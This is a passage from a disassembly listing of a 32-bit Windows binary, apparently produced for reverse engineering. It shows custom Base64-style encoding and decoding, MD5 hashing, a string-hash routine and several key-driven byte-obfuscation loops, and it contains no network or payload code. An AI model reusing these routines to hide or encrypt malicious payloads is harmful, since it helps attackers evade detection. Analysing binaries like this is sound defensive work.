movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: sub_4167F1+E4�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and byte_41E9B0[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov byte_41E9B0[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, byte_41E9B0[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: sub_4167F1+FE�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAB4
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EAB4
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_41EAB4[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: sub_4167F1+10C�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EAC8
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EAC8
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
